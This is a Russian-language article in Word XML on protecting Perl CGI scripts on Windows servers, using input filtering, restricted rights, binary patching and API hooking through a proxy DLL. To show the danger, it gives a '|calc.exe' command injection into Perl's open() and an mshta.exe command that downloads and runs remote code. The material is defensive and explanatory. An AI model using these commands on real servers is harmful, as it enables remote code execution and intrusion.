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A412C6" w:rsidRDefault="00A412C6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rStyle w:val="captionl1"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Защищаем Perl: шунт в мозг, или зверская нейрохирургия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Язык программирования Perl, будучи установленным на Web-сервере, отличается высокими требованиями к внимательности разработчика и квалификации системного администратора, при малейшей ошибке человека оставляя систему "открытой и доступной" для взломщиков всего мира. В статье рассмотрена возможность снизить угрозу, устанавливая свои собственные защитные механизмы (на примере "хирургического отрезания" и перехвата функций чтения, записи и выполнения файлов в системе Windows).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Если вы программируете (или собираетесь программировать) Internet-приложения на языке Perl, то наверняка сталкивались с информацией, описывающей уязвимости этого языка для хакерских атак. Простейший скрипт, приведенный в любом учебнике по языку Perl, на поверку оказывается "широко открытыми воротами" для хакеров, как многоопытных, так и начинающих. Например, фрагмент кода, который просто выводит содержимое указанного файла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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open(f,$filename);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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> while(&lt;f&gt;)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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  print;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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на самом деле может выполнять и другие действия. Подайте на его вход строку "|calc.exe", и вы запустите на выполнение стандартный калькулятор. В запуске на удаленном сервере стандартных программ (таких как calc.exe или notepad.exe) мало смысла, если не знать про идеальную отмычку хакера - утилиту mshta.exe. Она входит в стандартную поставку Windows и позволяет легко и непринужденно закачивать в атакуемую систему и выполнять в ней произвольный код.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Например, выполнение в системе команды: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mshta.exe http://www.malware.com/foobar.hta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приведет к скачиванию на компьютер файла foobar.hta и исполнению его как скрипта VBS. Этот пример создает и запускает безвредное (по заверениям устроителей сайта malware.com) приложение для MS-DOS, показывающее стандартный алгоритм генерации пламени. Естественно, таким же способом можно закачать и выполнить в системе произвольный исполняемый файл, даже если его там еще нет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Кому это нужно?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Мне хотелось бы развеять предубеждение некоторых системных администраторов, что взлом именно их сервера никому не нужен. Железный аргумент - ссылка на Неуловимого Джо ("не такая уж мы важная птица, чтобы нас ломать"). В действительности, взлом любого (произвольного) сервера может принести хакеру пользу, поскольку открывает ему новые замечательные возможности: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Разослать с уязвимого сервера пару-тройку гигабайт почтового спама. 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Устроить на уязвимом сервере "варезятник" для нелицензионного софта, музыки и видео. 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Выполнить сложный и интересный математический расчет (обычно просчитывают криптографию, чтобы подобрать чей-то ключ, вовлекая в этот процесс - чтобы дело шло быстрее - множество взломанных машин). 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Взломать или "заглушить" мусорными запросами (атака "отказ в обслуживании") более важный сервер (например, сервер какого-нибудь банка или государственного учреждения). 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Таким образом, уязвимые серверы, независимо от их важности, представляют опасность не меньшую, чем те люди, которые умеют использовать эти серверы по их прямому назначению. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Почему Perl уязвим?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Рациональное объяснение, зачем функция open в Perl отрабатывает символ конвейера | как команду запустить программу на выполнение, дать сложно: Perl вообще довольно иррациональный (зато гибкий и компактный) язык. :-) Автор языка Perl Ларри Уолл в шутку расшифровывает его название как Patalogically Eclectic Rubbish Lister (Паталогически Эклектичный Мусорный Листер) - мы можем лишь пожелать, чтобы следующие его версии развивались в направлении большей безопасности, однозначности и безошибочности кода - столь необходимых качеств для общедоступных Internet-приложений. Безусловно, "патологичность", "эклектичность" и "мусорность" - это отрицательные черты, с которыми Ларри Уолл должен бороться. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Фильтрация пользовательского ввода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В статьях о безопасном программировании на языке Perl можно встретить рекомендации фильтровать пользовательский ввод: в частности, удалять из полученных извне строк символы | и другие знаки, имеющие в Perl специальное значение. Например, следующая фильтрация ввода "обеззаразит" полученное извне имя файла от специальных и опасных символов.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  if ($filename =~/[&lt;&gt;\|\-&amp;\.\\\/\0]/)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     {die "Недопустимый символ в имени файла \n";}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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open(f, $filename);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Оцените, какое изобилие специальных значков - "крокозябликов" надо отфильтровать для простой функции открытия файла. Очевидно, что надо быть глубоким экспертом по языку Perl и очень внимательным человеком, чтобы правильно расставить все фильтры. Поскольку от человека, в отличие от железного лома, трудно требовать стопроцентной надежности, расставленные в разных местах программы "ловушки на крокозябликов" на практике могут не сработать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Ограничение прав Web-сервера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Internet-сервер и все запущенные им приложения, так или иначе, контактирующие со всем внешним миром, не должны иметь права администратора или привилегированного пользователя. Назначить службе Web-сервера ограниченные права - очень надежный (и, наверное, единственно правильный) способ защитить свой сервер от атак извне. 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При проектировании Internet-сайта необходимо с самого начала разбить его информационное содержимое на отдельные папки, где находятся: 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а) выполняемые скрипты и программы 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б) данные, предназначенные только для чтения (HTML-страницы) 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в) данные, предназначенные для изменения посетителями. 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Пользователь, под именем которого будет запущен Internet-сервер, должен иметь доступ только к этим папкам, причем, на скрипты и данные надо наложить запрет записи (иначе хакер может слегка изменить внешний вид и функционирование вашего сайта), а на данные, предназначенные для изменения внешними пользователями - запрет выполнения (иначе он сможет создать и тут же выполнить в этой папке все что угодно). Этот вариант защиты теоретически "невскрываем" - но на практике у начинающего администратора возникнет ряд сложностей.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Так, в системе Windows web-сервер не запустится, если не открыть ему на доступ системные dll в папке c:\winnt\system32. А если их открыть, всему миру окажутся доступными замечательные программы наподобие regedt32.exe, mshta.exe и т.д. Можно, конечно, переписать на листочек список необходимых программе системных dll и открыть на доступ Internet-серверу только их. Но многие ли администраторы это делают (и надо ли им это?).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В Unix-подобных системах существуют свои трудности (одна из возможных проблем - закрытый 80 порт для процессов, не имеющих административных привилегий в системе).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В любом случае, этот метод защиты требует хорошей подготовки и высокой мотивации администратора системы, что указывает на фундаментальный недостаток такой защиты: ее нельзя установить принудительно, вместе с установкой защищаемой программы, и надежность компьютерной системы полностью зависит от надежности самого слабого ее звена - человеческого мозга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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"Лоботомия" Perl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Лоботомия - это операция по изменению личности путем повреждения лобных долей мозга, отвечающих за агрессию. Одно время эту операцию применяли по отношению к преступникам, чтобы уменьшить их опасность для общества. Хирург при помощи специального инструмента через глазницы достигал этой области мозга и легким постукиванием деревянным молоточком по рукоятке инструмента наносил необходимые повреждения (избыточная кровь и клеточная масса удалялись с помощью гибкого зонда). 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Применять подобную операцию мы будем не к хакерам (в свое время ее признали бесчеловечной и антигуманной), а к бинарному дистрибутиву Perl, чтобы "отрубить" у него "агрессивную" реакцию на символ | ("конвейер"). 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Указанные ниже манипуляции носят тестовый характер - не применяйте их без тщательной проверки на тестовой системе и на тестовой копии данных. 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Для этого мы отыщем в бинарном дистрибутиве Perl (для экспериментов я использую дистрибутив ActivePerl версии 5.6) подстроку "cmd.exe". Это вызов стандартной оболочки Windows NT/2000/XP (для Windows 9x имя стандартной оболочки - "command.com"). Нас интересуют файлы с расширением dll, где найдена эта строка. Если мы вызываем Perl запуском perl.exe, то нужная нам компонента - Perl56.dll (название может отличаться в зависимости от версии дистрибутива). Заменим каким-нибудь редактором (я использую встроенный редактор Far) подстроку cmd.exe на что-нибудь другое той же длины, например, sex.exe. Таким образом, символ "конвейера" окажется нерабочим, однако, мы сможем по-прежнему запускать приложения функцией system("ИмяПрограммы"). Так, согласитесь, хотя и менее компактно, зато гораздо безопаснее и менее агрессивно. :-)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Программа sex.exe должна выводить на стандартный вывод (stdout) какое-нибудь доброе и трогательное приветствие для хакера. Я надеюсь, что с ее созданием вы легко справитесь самостоятельно. :-). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Перехват системных вызовов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Мы предупредили не все опасности, подстерегающие Perl-программиста.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Давайте предположим, что мы хотим запретить интерпретатору Perl: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запуск любых внешних программ (мудрое решение; ту же отсылку почты безусловно лучше выполнять стандартными функциями Perl - иначе "лоботомию", в той или иной степени, пришлось бы выполнять ко всем программам, которые мы запускаем) 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чтение файлов, если расширение не ".html" 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запись файлов, если расширение не ".user". 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Получив такой дистрибутив Perl, даже ... скажем так, не совсем грамотный Web-программист (требовать иного от живых людей мы не только не вправе, но и не в состоянии) будет чувствовать себя комфортно и, самое главное, сухо. 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Роль "защитной прокладки" в данном случае выполнит специальная dll, которая перехватит указанные нами системные вызовы и, при необходимости, их заблокирует (в отличие от антивирусов, которые перехватывают системные вызовы сразу всех процессов в системе, мы будем перехватывать только системные вызовы Perl, не трогая остальную систему). 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Мы будем использовать системные функции Windows GetProcAddress и GetModuleHandle, чтобы получить адреса функций для перехвата, ImageDirectoryEntryToData - чтобы получить адрес начала таблицы импорта, и функции VirtualProtect и WriteProcessMemory, чтобы внести изменения в эту таблицу.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Опираясь на эти ключевые слова, вы можете отыскать в Internet готовое решение, либо написать приложение-"перехватчик" самостоятельно. Получившийся у меня результат перехвата (я использовал компилятор Delphi, поскольку для языка C примеров можно найти достаточно) вы можете скачать по ссылке </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Внедрение защитной DLL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Чтобы "пристыковать" dll в адресное пространство процесса, я использую метод подмены DLL. Для этого я захожу ... правильно, текстовым редактором в исполняемый файл Perl.exe и исправляю подстроку Perl56.dll на romix1.dll (так мы назовем нашу защитную компоненту).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Пробую запускать Perl.exe. Конечно же, Perl пишет, что не найдена необходимая библиотека romix1.dll. Ну что же, создадим ее. Для этого скомпилируем программу из трех строк на Delphi, назвав ее romix1.dpr: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>library romix1;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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>begin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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>end.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Этого недостаточно: теперь Perl при запуске выдает ошибку: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"Perl.exe связан с отсутствующим компонентом Romix1.dll:RunPerl".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Perl импортирует единственную функцию RunPerl из этой библиотеки, и мы ее сейчас создадим (наша "подделка" будет просто передавать управление на "оригинал"):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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>library romix1;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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>procedure RunPerlOrig; external 'Perl56.dll' name 'RunPerl';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//Это оригинальная функция RunPerl из библиотеки Perl56.dll.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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>procedure RunPerl; export; stdcall;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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Перехватчик</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RunPerl 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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>begin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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  asm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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    jmp RunPerlOrig; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Делаем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>переход</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (jump)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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  end;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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>end;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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exports RunPerl;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begin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  //Расположенный здесь код будет выполняться при каждом запуске DLL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end.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Ассемблерная вставка делает переход, куда надо. Теперь ругательные сообщения прекратились, и изменений в работе Perl не видно. Зато мы достигли важного результата: наша dll стала полноправным членом (если не мозгом) исполняемого процесса Perl.exe. Дальнейшее становится делом техники (точнее, системных вызовов Windows API и нескольких "точечных" замен в таблице импорта Perl56.dll). Вы можете взять готовый код </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> и посмотреть, что у меня получилось.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Какие системные функции необходимо перехватывать?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Технология динамически компонуемых библиотек (DLL) существенно облегчает модификацию Windows-приложений (закрытый исходный код компенсируется тем, что все названия функций и точки их входа не только хорошо видны, но и доступны для изменения). Просматривать статический импорт DLL или EXE удобно при помощи утилиты dumpbin.exe из студии разработки Microsoft.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Пример вызова этой утилиты из командной строки: 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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dumpbin.exe /imports perl.exe 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Программа выдаст список DLL и их функций, которые импортирует программа из этих DLL. Вот полезный нам фрагмент вывода этой утилиты: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft (R) COFF Binary File Dumper Version 6.00.8168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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copyright (C) Microsoft Corp 1992-1998. All rights reserved.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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dump of file perl.exe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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File Type: EXECUTABLE IMAGE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Section contains the following imports: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Perl56.dll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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                402038 Import Address Table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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                4020C0 Import Name Table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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                     0 time date stamp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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                     0 Index of first forwarder reference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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3C3  RunPerl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...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Замечание: Из этого листинга мы видим, что программа импортирует библиотеку Perl56.dll Это большая и "тяжелая" динамическая библиотека, которая поддерживает все функции Perl; Perl.exe же фактически является небольшим загрузчиком для этой библиотеки, только лишь запуская ее единственную функцию RunPerl. Смысл такого разделения, видимо, в том, что при завершении работы Perl.exe система выгружает библиотеку из памяти лишь через несколько секунд, если к ней не будет новых обращений. Поскольку все запущенные копии Perl.exe используют только одну копию библиотеки, система экономит время на выгрузках-загрузках (при условии, конечно, что эта библиотека постоянно "висит" в памяти). Замечу, что экономии памяти от такого разделения не происходит, т.к. общие страницы всех запущенных копий одного и того же исполняемого файла система по любому помещает на одни и те же физические адреса. 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Аналогично мы можем выяснить импорт библиотеки Perl56.dll (список функций, конечно же, окажется гораздо длиннее). Дальнейшие выяснения, на какие функции надо ставить "жучок", мы произведем опытным путем - мы примерно знаем (а если не знаем, то посмотрим), :-) какие API-функции должна импортировать скомпилированная в системе Windows простейшая тестовая C-программа, которая выполняет нужные нам действия. Другой вариант - выяснить это при помощи специальных "лоботомических инструментов": например, Numega SoftICE или Numega Bounds Checker (их рассмотрение выходит за рамки этой статьи). Я приведу лишь результат своих изысканий: нужные нам функции - это CreateProcessA (запуск приложения) из библиотеки KERNEL32.dll и функция fopen (открытие файла на чтение или на запись) из библиотеки MSVCRT.dll.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"За кадром" остались такие специальные вопросы, как формат таблицы импорта Windows-программы. Отчасти эту информацию можно получить в комментариях исходного кода </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, а отчасти - из литературы. Кстати, полезные для начинающих хакеров источники (например, книги Криса Касперски, Джеффри Рихтера и Мэтта Питрека) можно скорее найти в сети Internet, чем в книжных магазинах, где их почему-то очень быстро раскупают. :-) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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Заключение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Мы попытались защитить Perl - один из наиболее популярных (хотя и несколько эклектичных) :-) языков для работы с CGI - от атак из Internet. Мы делали это на разных уровнях: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Фильтрацией пользовательского ввода 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Ограничением прав доступа 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Заменой подстрок в теле программы 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Перехватом системных вызовов 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Возможны еще два уровня защиты: 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Перекомпиляция Perl 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Перекомпиляция ядра операционной системы. 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Эффективность защиты во всех рассмотренных случаях идет "по нарастающей".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Разумеется, нам важна не просто перекомпиляция, а перекомпиляция с внедрением защитных проверок. Наша цель - внедрить эти проверки тем или иным способом, пусть даже антигуманным и "хакерским". При помощи деревянного молоточка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>А авторы дистрибутивов уже сами разберутся, включать ли защитные опции в состав своих продуктов, и активизировать ли их по умолчанию. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="590"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00A412C6">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="1440" w:footer="1440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4513DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BAAF14C"/>
    <w:lvl w:ilvl="0" w:tplc="834C9D5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10FE2AA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8F7024F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48205870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1F30E262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7B32A9D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FA00645C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924A8A9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8A26505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2B243F63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10340A8A"/>
    <w:lvl w:ilvl="0" w:tplc="9B14CE3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E04C5B4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F310460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8A508F8C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8F02E65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537E8FF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6BAE7438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F242718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DC183AC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351E07E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="466AAA64"/>
    <w:lvl w:ilvl="0" w:tplc="72A2276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781C562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720A89F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E3E2F48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A7028AA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E48C869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A3F0A3F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C3CABDA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A9FEE4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">
    <w:nsid w:val="65EA0B15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3D43D30"/>
    <w:lvl w:ilvl="0" w:tplc="ED1275E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632263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451CC18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ED14AC6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2D1850E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C75E1C6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DA963124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87ECE160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C1242D2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>
    <w:nsid w:val="7EAE2A79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34B2EEA8"/>
    <w:lvl w:ilvl="0" w:tplc="4A3A039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8A82303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1A1867C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D28CE8B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8E6894F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0056497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CE6A3758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8A30F694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3E441AA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hyphenationZone w:val="425"/>
  <w:drawingGridHorizontalSpacing w:val="71"/>
  <w:displayVerticalDrawingGridEvery w:val="2"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:doNotValidateAgainstSchema/>
  <w:doNotDemarcateInvalidXml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31C14"/>
    <w:rsid w:val="002B34AA"/>
    <w:rsid w:val="00376F61"/>
    <w:rsid w:val="00A412C6"/>
    <w:rsid w:val="00E31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C4A61D3A-CA1C-4250-AD0B-FC9B6B52F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/>
    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden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link w:val="10"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="19"/>
      <w:szCs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styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="j">
    <w:name w:val="j"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="514"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
